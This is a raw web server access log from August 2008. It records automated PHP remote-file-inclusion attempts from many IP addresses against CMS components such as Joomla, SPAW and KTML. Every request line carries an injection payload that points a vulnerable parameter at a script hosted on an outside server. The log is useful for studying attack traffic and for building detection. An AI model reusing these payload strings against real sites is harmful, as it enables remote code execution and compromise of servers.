83.133.96.246 - - [22/Aug/2008:06:38:33 -0500] "GET /logs/access_log.1207872000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:38:43 -0500] "GET /logs/access_log.1210896000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:38:54 -0500] "GET /logs/access_log.1215907200//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:38:56 -0500] "GET /logs/access_log.1213056000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:38:58 -0500] "GET /logs/access_log.1214784000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:38:58 -0500] "GET /logs/access_log.1212710400//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:39:03 -0500] "GET /logs/access_log.1211587200//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:39:17 -0500] "GET /logs/access_log.1213228800//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:39:19 -0500] "GET /logs/access_log.1209945600//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:39:26 -0500] "GET /logs/access_log.1207699200//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.133.96.246 - - [22/Aug/2008:06:39:35 -0500] "GET /logs/access_log.1207440000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.186.15.66 - - [22/Aug/2008:06:39:43 -0500] "GET /logs/access_log.1206230400%20//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
87.230.21.231 - - [22/Aug/2008:06:42:11 -0500] "GET /bughttp://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
77.249.65.213 - - [22/Aug/2008:06:44:00 -0500] "GET /logs/config.php?path_to_root=http://200.175.20.66/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
77.249.65.213 - - [22/Aug/2008:06:44:01 -0500] "GET /config.php?path_to_root=http://200.175.20.66/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
91.186.15.66 - - [22/Aug/2008:06:45:13 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
80.67.20.130 - - [22/Aug/2008:06:46:06 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
80.67.20.130 - - [22/Aug/2008:06:46:07 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
66.135.41.76 - - [22/Aug/2008:06:50:44 -0500] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://secret-wishes.net/images/tanii?????? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:06:50:44 -0500] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://secret-wishes.net/images/tanii?????? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
217.113.53.6 - - [22/Aug/2008:06:53:41 -0500] "GET /logs/!scanhttp://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:06:53:42 -0500] "GET /!scanhttp://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:06:54:05 -0500] "GET /logs/access_log.1212364800/!scanhttp://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:06:54:06 -0500] "GET /!scanhttp://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:06:54:06 -0500] "GET /logs/!scanhttp://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:06:55:04 -0500] "GET /logs/access_log.1212278400/!scanhttp://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
72.9.233.10 - - [22/Aug/2008:06:55:51 -0500] "GET /logs/access_log.1208044800///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:06:55:51 -0500] "GET ///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:06:55:51 -0500] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
64.22.100.83 - - [22/Aug/2008:06:56:15 -0500] "GET ///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.813"
64.22.100.83 - - [22/Aug/2008:06:56:15 -0500] "GET /logs/access_log.1208044800///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.813"
64.22.100.83 - - [22/Aug/2008:06:56:15 -0500] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.813"
200.213.33.2 - - [22/Aug/2008:06:56:27 -0500] "GET /logs/?custompluginfile[]=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 200 96216 "-""libwww-perl/5.805"
200.213.33.2 - - [22/Aug/2008:06:56:29 -0500] "GET /?custompluginfile[]=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
203.98.87.14 - - [22/Aug/2008:06:56:38 -0500] "GET ///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
195.199.190.37 - - [22/Aug/2008:06:57:15 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.199.190.37 - - [22/Aug/2008:06:57:15 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:06:57:32 -0500] "GET /logs//naboard_pnr.php?skin=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:06:57:33 -0500] "GET //naboard_pnr.php?skin=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
190.81.184.98 - - [22/Aug/2008:07:02:58 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
190.81.184.98 - - [22/Aug/2008:07:02:58 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
216.139.67.90 - - [22/Aug/2008:07:04:04 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.64"
216.139.67.90 - - [22/Aug/2008:07:04:08 -0500] "GET //?path%5Bdocroot%5D=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.64"
216.139.67.90 - - [22/Aug/2008:07:04:08 -0500] "GET /logs//?path%5Bdocroot%5D=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 200 96221 "-""libwww-perl/5.64"
88.158.0.5 - - [22/Aug/2008:07:04:19 -0500] "GET /logs//contenido.php?sec=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
88.158.0.5 - - [22/Aug/2008:07:04:19 -0500] "GET /logs//contenido.php?sec=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
88.158.0.5 - - [22/Aug/2008:07:04:20 -0500] "GET //contenido.php?sec=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
88.158.0.5 - - [22/Aug/2008:07:04:20 -0500] "GET //contenido.php?sec=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
89.111.176.122 - - [22/Aug/2008:07:04:22 -0500] "GET /logs/access_log.1206230400/error.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.176.122 - - [22/Aug/2008:07:04:23 -0500] "GET /error.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.111.176.122 - - [22/Aug/2008:07:04:23 -0500] "GET /logs/error.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.98.87.14 - - [22/Aug/2008:07:05:18 -0500] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
59.125.183.76 - - [22/Aug/2008:07:05:46 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
59.125.183.76 - - [22/Aug/2008:07:05:46 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
85.159.91.143 - - [22/Aug/2008:07:08:22 -0500] "GET /logs//send_reminders.php?includedir=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:07:08:22 -0500] "GET /logs//send_reminders.php?includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:07:08:22 -0500] "GET //send_reminders.php?includedir=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:07:08:22 -0500] "GET //send_reminders.php?includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:07:08:23 -0500] "GET /logs//send_reminders.php?includedir=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:07:08:23 -0500] "GET //send_reminders.php?includedir=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:07:08:26 -0500] "GET /logs//send_reminders.php?includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:07:08:26 -0500] "GET //send_reminders.php?includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
201.130.79.132 - - [22/Aug/2008:07:08:39 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:07:08:39 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.186.30.30 - - [22/Aug/2008:07:09:45 -0500] "GET /logs/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:07:09:46 -0500] "GET /errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:07:09:47 -0500] "GET /logs/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:07:09:47 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:07:09:47 -0500] "GET /errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:07:09:48 -0500] "GET //index.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:07:09:51 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:07:09:51 -0500] "GET //index.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
85.214.88.11 - - [22/Aug/2008:07:10:23 -0500] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [22/Aug/2008:07:10:23 -0500] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.214.88.11 - - [22/Aug/2008:07:10:24 -0500] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
85.214.88.11 - - [22/Aug/2008:07:10:24 -0500] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
82.194.76.177 - - [22/Aug/2008:07:11:32 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 299 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
82.194.76.177 - - [22/Aug/2008:07:11:32 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 294 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
91.121.13.142 - - [22/Aug/2008:07:12:11 -0500] "GET //naboard_pnr.php?skin=http://jonclan.webng.com/Id/vid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
91.121.13.142 - - [22/Aug/2008:07:12:11 -0500] "GET /logs//naboard_pnr.php?skin=http://jonclan.webng.com/Id/vid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
67.205.106.40 - - [22/Aug/2008:07:13:08 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
67.205.106.40 - - [22/Aug/2008:07:13:09 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
67.205.106.40 - - [22/Aug/2008:07:13:09 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
190.137.181.149 - - [22/Aug/2008:07:15:05 -0500] "GET //include/write.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:07:15:05 -0500] "GET /logs//include/write.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:15:12 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:15:13 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:07:15:15 -0500] "GET /logs/access_log.1214524800//include/write.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:15:15 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:07:15:31 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
72.9.233.10 - - [22/Aug/2008:07:15:32 -0500] "GET ///vwar/backup/errors.php?error=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:07:15:32 -0500] "GET /logs///vwar/backup/errors.php?error=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:07:15:32 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:07:15:36 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
87.22.37.144 - - [22/Aug/2008:07:16:08 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.22.37.144 - - [22/Aug/2008:07:16:08 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
64.22.100.83 - - [22/Aug/2008:07:16:08 -0500] "GET /logs///vwar/backup/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.813"
64.22.100.83 - - [22/Aug/2008:07:16:08 -0500] "GET ///vwar/backup/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.813"
64.22.100.83 - - [22/Aug/2008:07:16:08 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.813"
87.22.37.144 - - [22/Aug/2008:07:16:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.22.37.144 - - [22/Aug/2008:07:16:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
64.22.100.83 - - [22/Aug/2008:07:16:13 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.813"
203.98.87.14 - - [22/Aug/2008:07:16:41 -0500] "GET ///vwar/backup/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
203.98.87.14 - - [22/Aug/2008:07:16:49 -0500] "GET ///vwar/backup/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
190.137.181.149 - - [22/Aug/2008:07:17:45 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:07:17:45 -0500] "GET //errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:07:17:49 -0500] "GET /logs//errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:18:00 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:18:01 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:07:18:02 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
211.115.110.116 - - [22/Aug/2008:07:18:29 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.115.110.116 - - [22/Aug/2008:07:18:29 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.115.110.116 - - [22/Aug/2008:07:18:30 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
190.137.181.149 - - [22/Aug/2008:07:18:48 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
211.247.226.253 - - [22/Aug/2008:07:18:57 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
211.247.226.253 - - [22/Aug/2008:07:18:57 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
211.247.226.253 - - [22/Aug/2008:07:18:58 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
190.81.184.98 - - [22/Aug/2008:07:19:45 -0500] "GET /logs/access_log.1214438400//index.php?option=com_jreactions&mosConfig_absolute_path=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
190.81.184.98 - - [22/Aug/2008:07:19:46 -0500] "GET //index.php?option=com_jreactions&mosConfig_absolute_path=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.81.184.98 - - [22/Aug/2008:07:19:46 -0500] "GET /logs//index.php?option=com_jreactions&mosConfig_absolute_path=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
89.111.176.122 - - [22/Aug/2008:07:20:34 -0500] "GET /logs/access_log.1201564800/error.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.231.35.38 - - [22/Aug/2008:07:20:49 -0500] "GET /logs/access_log.1214524800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
203.231.35.38 - - [22/Aug/2008:07:20:49 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
203.231.35.38 - - [22/Aug/2008:07:20:49 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
